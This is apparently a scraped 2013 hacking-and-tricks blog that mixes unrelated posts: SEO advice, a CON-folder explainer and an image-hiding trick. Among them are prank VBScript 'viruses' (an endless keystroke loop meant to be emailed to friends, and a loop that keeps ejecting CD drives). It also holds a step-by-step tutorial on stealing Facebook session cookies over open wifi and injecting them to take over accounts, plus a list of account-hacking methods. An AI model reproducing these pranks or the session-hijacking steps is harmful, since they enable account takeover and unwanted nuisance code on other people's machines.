Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop

Send this file to your friends as an email attachment to see the fun.
Notepad Virus

Create a Harmless Funny Virus with Notepad-Continuously eject CD/DVD drives


This VBS trick will create a code which will continuously eject all your connected Optical drives. If you put them back in, it will pop them out again. Copy this code and paste it in Notepad as Virus.vbs or *.vbs.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Double click to open this file and you will be impressed by this awesome trick.

Make a Personal Diary(Log) with Notepad (Easter Eggs)












Notepad Diary
Notepad Diary


You can use this trick to create a personal log with Notepad which will automatically include the current date and time before your note. To do so, open Notepad and type .LOG in capital letters and press Enter. Save the file. Now, every time you open this file, notepad will automatically insert the current time and date before the note. Just enter your note and save the file each time after making an entry.

All these Notepad tricks are totally harmless and would not harm your PC in any way.  To close any of the VBS trick given, open task manager and close the wscript.exe process. These tricks work on Windows 8, Windows 7, Windows Vista and Windows XP.
Read More

Tuesday 19 February 2013

How to learn SEO | .::APAJR::.

| |
0 comments
If you’d like to learn SEO the Distilled way, enrol in our online SEO University – DistilledU. Learn at your own pace with interactive modules written by our team of SEO consultants.

When you talk to SEOs about how they got into the industry, the stories are always pretty varied.  There is no standard route into SEO given that it isn’t taught at University or College, at least not as a stand alone course.  Many people tend to fall into SEO by accident and catch the bug, that bug is usually getting one of their own websites to number 1.

As I’ve become more experienced over the years and starting running my own team at Distilled and worked with people who are brand new to SEO, I’ve collected various links, resources and notes that I will give to new starters at Distilled to help give them a head start.  This post will share all of this so you also have a point of reference for you to give to new starters in your own company.

My thoughts on learning SEO


I wanted to start off with my own opinion on learning SEO, I’m not saying I’m right on all these things, in fact I’d encourage you to tell me what has worked for you if it differs from my approach.

Challenge assumptions with your own testing


I’ve always felt that the best way to learn SEO is by doing it.  I encourage any SEO to build their own website and use it to test SEO theories and to challenge what they are told by “experts”.  I’m not saying you should learn to code (although I think knowing code and markup basics is very valuable), you can just use a WordPress installation and not code anything.  The point here is to have access to a site which you can test to your heart’s content and verify what you are told.



Yes, you should look to learn from others in the industry who write blog posts and speak at conferences, one of the best things about our industry is the open sharing of knowledge and you should take advantage of that.  However it is good to have a healthy scepticism when you’re presented with ideas and information.

I started my own blog back in 2007 for exactly this reason and for the first few years, deliberately didn’t “do SEO” on it.  I just published content and looked at how Google interpreted it, indexed it and ranked it.  I didn’t try and control Google crawls or push links to certain pages, I just wanted to assess what happened naturally.  This taught me more than most blog posts and allowed me to see what elements on my site and content truly mattered to Google.

I now have a number of my own test sites and often open them up to testing theories.  Often I’m wrong and I’ll challenge an assumption which turns out to be correct.  That’s fine and the next time I speak to a client about that topic, I have true experience and data to backup my instinct and opinion.

Takeaway tip – challenge assumptions and test for yourself.

Go to SEO conferences and networking events


I’ve been to a number of SEO conferences and have spoken at a few too. The value as an attendee can be quite mixed depending on the conference and the speakers.  Overall though, if you are new to the industry and haven’t been to a conference, I’d encourage you to go.  My first conference was SMX London in 2009 and I learnt loads from the speakers and was able to take a lot back to my job and implement.  A year later I had joined Distilled and went again and being honest, didn’t find it as valuable given I’d really stepped up my learning and joined a great company where I was learning fast.

But it was this first conference experience that really opened my eyes as to what else was possible and how much learning I needed to do.  It also helped my own confidence and verified that my approach and knowledge was on a par with people of the same experience.  The value of attending a conference often goes beyond the speakers and sessions, the true value is in speaking to others in the industry and sharing insights.  This community is one of the friendliest I’ve known and I’ve learnt so much from chatting to people at the bar after a conference or during a coffee break – don’t underestimate the value of this.

I don’t think I could finish this section without mentioning that we have SearchLove London and Boston coming up later this year and these are the perfect events to attend if you have never attended a conference before.  The topics cover just about everything you need to be aware of and the networking events are amongst the best I’ve been to.  I know I’m naturally biased but I’m not the only one that thinks Distilled conferences are awesome:



If you are based in the UK and are in the North, local conferences which I’ve enjoyed and are worth looking at are Think Visibility in Leeds and SAScon in Manchester, both of which are great on the social front too.  If you are in the US, I’d highly recommend MozCon but you’ll have to wait until 2013 now for the next one!

In terms of networking, there are always smaller networking events going on which are often free.  These are also a great place to start and don’t require budget from your boss to attend.  The best place to start is Meetup and do a search of your local area to see what events are coming up.

I’ve only been to local meetups in London so I have no recommendations for the North I’m afraid!  For those of you in London I’d recommend trying to go to OMN run by Quad, Search London or our own Distilled meetups.

Takeaway tip – attend conferences and local free meetups

Resources for learning SEO


This is a version of what I send to people (inside and outside Distilled) if they ask about learning SEO.  Over the last few months it has become much easier to point them in the right direction with the growth of DistilledU, but there are still loads of other great resources that should be on any newbies reading list.

News and industry updates



Blogs for learning and educational content



Larger guides / heavy reading



Technical SEO specific resources



Link building specific resources



Analytics specific resources



I could go on but I think that gives most newbies a good starting point!

Let me know your feedback, resources and approach to learning SEO in the comments.
Read More

Learning SEO Online, the Best Places to Get Started | .::APAJR::.

| |
0 comments
I always have to chuckle when people ask me what university or school I went to learn SEO. As far as I’m aware, there are still no accredited courses available for learning SEO anywhere. The web itself however is a great place to start, and even though you won’t end up with an official degree in SEO, the hands-on experience you get is priceless, especially when you’re able to deliver results for your company.

Learning SEO online

Some of my favorite places to sharpen SEO skills can be found below:

DistilledU


The SEO geniuses at Distilled started the Distilled U program about six months ago and it has become the go-to tool for every new SEO that we hire at the moment. The online training modules currently span nearly 50 hours and they cover everything from Search Engine basics to On-page optimization to Keyword Research and Link Analysis. All this is just in the 101 section – once you’re finished soaking up all that knowledge, the next level up is “Further SEO” which extensively covers advanced topics such as Linkbait, Content Strategies and Structured Data.

SEOmoz


No list would be complete without the essential Beginners Guide to SEO which SEOmoz has been managing and updating for several years now. The guide is only one part of the vast amount of “know-how”that can be found in the Q&A section and the blogs, both the SEOmoz and the Youmoz edition. And, be sure to tune in to the famous Whiteboard Friday sessions when you can.

SEOTools


A relatively new kid on the block, created by an old-school SEO legend, Aaron Wall. The SEOTools.net site aims to provide industry insights and introduction overviews of SEO related topics. Aaron of course also runs one of the most respected SEO communities and and SEO training courses online. This isn’t a free option, but I have been told it’s one of the best ways to spend money if you want to learn how to make money. Also make sure you check out the free toolset that he’s made available for free.

Link Building Course by PointblankSEO


Jon Cooper, an up and comer in the SEO industry, loves building links. Jon’s thrown all his experience into this well presented link building course. I signed up about a month ago and it is hands down one of the most comprehensive courses when it comes to link building, which should be an integral part of any SEO campaign. If you don’t believe me, just have a look at the names that are recommending the course on his signup page.

Inbound Marketing University


Hubspot is a fantastic platform but they also a very rich source of SEO information. The whitepapers, casestudies and ebooks which they put up for free are full of valuable and actionable advice. You can even become a certified inbound marketer if you run through the program which they maintain.

A special mention goes to the LinkMoses  private newsletter by Eric Ward, which is always filled with pearls of link building wisdom and link opportunities. Another subscription I highly recommend comes from Michael Martinez’s Premium Newsletter. He covers a lot of ground with every edition, ranging from technical SEO advice to SEO experiments and insights.

As useful as these resources will prove, at the end of the day it still comes down to getting your hands dirty. Make sure that you won’t turn into a “good on paper” SEO, but that you hone your skills with real world experience.

Finally, I’d love to hear from you guys where you’ve picked up your SEO skills. Share the knowledge and leave a comment.
Read More

Get Started with the Beginner's Guide to SEO | .::APAJR::.

| |
0 comments
Beginner's Guide to SEO



New to SEO? Need to polish up your knowledge? The Beginner's Guide to SEO has been read over 1 million times and provides comprehensive information you need to get on the road to professional quality SEO.

What is Search Engine Optimization (SEO)?


SEO is the practice of improving and promoting a web site in order to increase the number of visitors the site receives from search engines. There are many aspects to SEO, from the words on your page to the way other sites link to you on the web. Sometimes SEO is simply a matter of making sure your site is structured in a way that search engines understand.

Search Engine Optimization isn't just about "engines." It's about making your site better for people too. At SEOmoz we believe these principles go hand in hand.

This guide is designed to describe all areas of SEO - from discovery of the terms and phrases (keywords) that generate traffic, to making a site search engine friendly, to building the links and marketing the unique value of the site/organization's offerings. Don't worry, if you are confused about this stuff, you are not alone.
Search Engine Market Share

Why does my website need SEO?


The majority of web traffic is driven by the major commercial search engines - Google, Bing and Yahoo!. Although social media and other types of traffic can generate visits to your website, search engines are the primary method of navigation for most Internet users. This is true whether your site provides content, services, products, information or just about anything else.

Search engines are unique in that they provided targeted traffic - people looking for what you offer. Search engines are the roadways that makes this happen. If your site cannot be found by search engines or your content cannot be put into their databases, you miss out on incredible opportunities available to websites provided via search.

Search queries, the words that users type into the search box, carry extraordinary value. Experience has shown that search engine traffic can make (or break) an organization's success. Targeted visitors to a website can provide publicity, revenue, and exposure like no other channel of marketing. Investing in SEO, whether through time or finances, can have an exceptional rate of return compared to other types of marketing and promotion.


Search Engine Traffic


Why can't the search engines figure out my site without SEO?


Search engines are smart, but they still need help. The major engines are always working towards improving their technology to crawl the web more deeply and return better results to users. However, there is a limit to how search engines can operate. Whereas the right SEO can net you thousands of visitors and attention, the wrong moves can hide or bury your site deep in the search results where visibility is minimal.

In addition to making content available to search engines, SEO also helps boost rankings so that content will be placed where searchers will more readily find it. The Internet is becoming increasingly competitive, and those companies who perform SEO will have a decided advantage in visitors and customers.

Can I do SEO for myself?


The world of SEO is complex, but most people can easily understand the basics. Even a small amount of knowledge can make a big difference. For the most part, SEO education is free and available on the web, including guides like this. Combine this with a little practice and you are well on your way to becoming a guru.

Depending on your time commitment, willingness to learn, and complexity of your website(s), you may decide you need an expert to handle things for you. Firms that practice SEO can vary; some have a highly specialized focus, while others take a more broad and general approach. Optimizing a web site for search engines can require looking at so many unique elements that many practitioners of SEO (SEOs) consider themselves to be in the broad field of optimization and website strategy.

Still, even in this case, it's good to have a firm grasp of the core concepts.

How much of this article do I need to read?


If you are serious about improving search traffic and are unfamiliar with SEO, we recommend reading this guide front-to-back. It's short and easy to understand. There's a printable PDF version for those who'd prefer, and dozens of linked-to resources on other sites and pages that are worthy of your attention. Because you've given us your attention, we've attempted to remain faithful to Mr. William Strunk's famous quote:


"A sentence should contain no unnecessary words, a paragraph no unnecessary sentences, for the same reason that a drawing should have no unnecessary lines and a machine no unnecessary parts."



Every section of this guide is critical to understanding the most effective practices of search engine optimization.

Read More

Monday 18 February 2013

Nobody can create a FOLDER anywhere on the computer which can be namedas “CON”. | .::APAJR::.

| |
0 comments
[caption id="attachment_21" align="alignnone" width="470"]join us group http://www.facebook.com/groups/Apajrengineerhackers/[/caption]



I got an interesting mail that claims

nobody can create a FOLDER anywhere on the computer which can be named as “CON”.
This is something pretty cool…and unbelievable… At Microsoft the whole Team, including Bill Gates, couldn’t answer why this happened!
TRY IT NOW !!


This is not the first time I got this mail, and I’m sure most of you must have received it too. If you try creating a folder named CON, as the mail claims, it’ll get renamed automatically to New Folder. But there is no mystery behind this, and the team at Microsoft very well knows the reason for this. 





















Before we proceed further, let me tell you a small secret you can’t even create a folder named PRN, AUX, NUL and many others.

The reason you can’t create a folder with these names is because these are reserved keywords used by DOS. The below screen-shot taken from Microsoft’s website shows a list of reserved keywords in DOS.









If you try creating a folder with any of these names, the name automatically changes back to the default “New Folder”. And this is what has caused the confusion. Instead of automatically renaming the folder, had an explanatory warning message popped up, we would have had one less hoax mail to deal with.

















There is actually a way to create a folder named CON, or any other name from the above list of reserved keywords. This can be done through command prompt. But it is advisable not to do so, as it might result in your system becoming unstable.

  • To create a folder named CON, go to command prompt and type “MD \.D:CON” (without quotes). This will create a folder named CON in D:. See the screenshot of my machine.





You cannot delete this folder by normal delete. To delete the folder, again go to command prompt and type “RD \.D:CON” without quotes.

  • I’ll again recommend you not to try this on your system, as it might become unstable. In case you can’t stop yourself, don’t do it on a drive on which Windows is installed (generally C:).

Next time when you get such a mail, reply to the sender and direct him or her to this page.

Have you ever come across such hoax mails? Do let us know what do you do to tackle them through your comments.







You can also contact me at facebook

Facebook Profile : http://www.facebook.com/maurya.ashish.apajr?ref=tn_tnmn

You can also join our group to learn Hacking and Computer science..

Facbook group : http://www.facebook.com/groups/255805587869465/



Read More

Text message Hide in Image | .::APAJR::.

| |
0 comments




anonymous
Hi Guys. Today we will see how to hide Text Message in any image file.
This is an awesome trick and very easy one too. IF you wish to send a text messega to you friends privately or you yourself want to hide a text message in image file then this article will help you a lot.

After hiding the message in a image file there will be no damage to the file just the size of the file will increase a bit.

So lets check how it is done.

First of all open run and type cmd., click enter. This will open Command promt.
Now you have to navigate to the folder where you have copied the files(1 .jpg file and 1 txt file which contains your message.)

For example, if your files are in "D" drive, then after opening cmd, type, D: and hit enter, now you are in your d drive, now if your folder name is Photos then type "cd photos" (without quotes) now you are in photos folder.

Now main step. Type this command after navigating to the folder.

copy /b imagefilename.jpg + textfilename.txt outputimagename.jpg
Type the exact code, but dont forgot to replace the few words, imagefilename.jpg with your image file name and with proper extension, textfilename.txt with your text file, outputimagename.jpg your output image name, use whatever you want, but remember to use right extension.
All done by now your message has been hiden in you image and a new folder will be created in the same folder with the name you wrote in place of outputimagename.jpg.

As everything is done by now. you must be thinking how to view the message now.
dont worry we will see that too. its very simple .
You just have to open the output file with notepad, scroll down to the bottom. check the last line.
you message will be displayed there.

If you have any problem with this plz feel free to comment below with you issue.

Thank you. :)
Read More

Friday 8 February 2013

Session Hijacking Facebook Accounts | .::APAJR::.

| |
0 comments
This is a tutorial that demonstrates just how simple it is to get access to facebook accounts without the user's password or username. This tutorial demonstrates Session Hijacking (discussed here: : www.facebook.com/APAJREngineerHackers  or  http://www.facebook.com/groups/Apajrengineerhackers/ ).  This is a simple attack done on an unsecured wifi network with the permission of all users on the network.

The aims of this tutorial are:

  • Educate users on the dangers of using unsecured wireless connections.

  • Educate wireless connections managers in the aim that they will protect their wireless network.

  • Demonstrate the simplicity of this attack and why there is need to find a solution for this attack.

  • Get users to stop using unsecure wireless connections.

Requirements:

  • Someone on the network must be on facebook at the time for you to steal their session information.

  • You Wi-Fi adapter must have monitor mode support in order to scan all packets transferred over a network. If it doesn't, you would only be scanning your own packets. To learn more about monitor mode and about enabling monitor mode on your Wireless card, visit http://www.aircrack-ng.org/doku.php?id=airmon-ng

So here is a step by step explanation of how to carry out this attack:

=> First of all, you would need to connect to an unsecured wireless connection that others are using. Then we start capturing packets transferred over this network. Note that your wireless adapter needs to support monitor mode to scan all packets transferred over a network. you can check your wi-fi card specifications to see if it supports monitor mode.

=>We would then need to use a network sniffing tool so sniff packets transferred over the network. In this case, I am using a tool called Wireshark (http://www.wireshark.org). Within wireshark, there is a menu called "Capture"; Under the capture menu, select interfaces from that menu, and a list of your interfaces will come up:





=> Next you select Start Next to the interface that you have enabled monitor mode on. most times it is the interface that is capturing the most packets. In my case, Microsoft interface is capturing the most packets, so i will select to start capturing with the microsoft interface. You would leave wireshark to capture packets for a couple of seconds depending on the amount of persons currently using the network. Say 30 seconds if 10 people currently are using the network, or 30 minutes if there is barely network activity going on. While capturing, wireshark will look something like this:





=> After capturing a certain amount of packets, or running the capture for a certain amount of time, stop it by clicking on the stop current capture button.





=> After stopping the capture, you will need to look for the user's facebook session cookie which, hopefully was transferred in one of the packets captured. to find this cookie, use the wireshark search which can be found by pressing "ctrl + f" on your keyboard. In this search interface, select Find: By "String"; Search In: "Packet Details". and Filter by the string "Cookie".





=> When you press find, if there is a cookie, this search will find it, if no cookie was captured, you will have to start back at step 2. However, if youre lucky and some cookies we're captured, when you search for cookie, your interface will come up looking like this in the diagram below. You would notice the cookie next to the arrow contains lots of data, to get the data. the next thing you do is to right click on the cookie and click copy->description.





=> After copying the description, paste it in a text file, and separate each variable to a new line (note the end of every variable is depicted by a semicolon eg - c_user=100002316516702;).

=> After some research and experimenting, i figured out that facebook authenticated the user session by 2 cookies called c_user and xs. Therefore you will only need the values of these cookies, and then need to inject them into your browser. Before injecting the cookies, here is what my facebook page looked like:





=> The next thing you would need to do is to inject this information as your own cookie. so firstly you would need to install a cookie manager extension for your browser, I'm using firefox Cookie Manager. After installing this extension, you will find it under Tools->cookie manager. The interface for cookie manager looks like this:





=> The first thing we would need to do is to clear all cookies, so clear all the cookies you currently have. Then select the "Add Cookie" link to add a new cookie. The first cookie you will add is the c_user cookie which will have the following information:: Domain - ".facebook.com", name-"c_user", value-"the value you copied earlier from the wireshark scanning" and the Path-"/"; leave the isSecure and Expires On values to default:





=> The next thing you do is to hit the "Add" button and the cookie is saved. Repeat the same steps to add the xs cookie with all of the same information, except the value, which would be the xs value you have.





=> After adding these 2 cookies, just go to facebook.com, refresh the page and... Boom!! you will see you are logged in as that user whose cookie information you stole. Here is my facebook page after i injected those cookies:



Read More

Top 10 Ways to Hack Facebook Accounts | .::APAJR::.

| |
0 comments




Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers have , I have written a couple of post related to facebook hacking here. I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2013, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts.

10 Ways How Hackers Can Hack Facebook Accounts


So here are the top 10 methods which have been the most popular in 2012:


1. Facebook Phishing 










Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.


2. Keylogging 



Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.




3. Stealers 





Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful.


4. Session Hijacking






Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's.


5. Sidejacking With Firesheep




Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.


6. Mobile Phone Hacking



Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.

7. DNS Spoofing 

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.


8. USB Hacking 
Usb password stealer

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below:


9. Man In the Middle Attacks

If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article,


10. Botnets 

Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.
Read More
Powered by Blogger.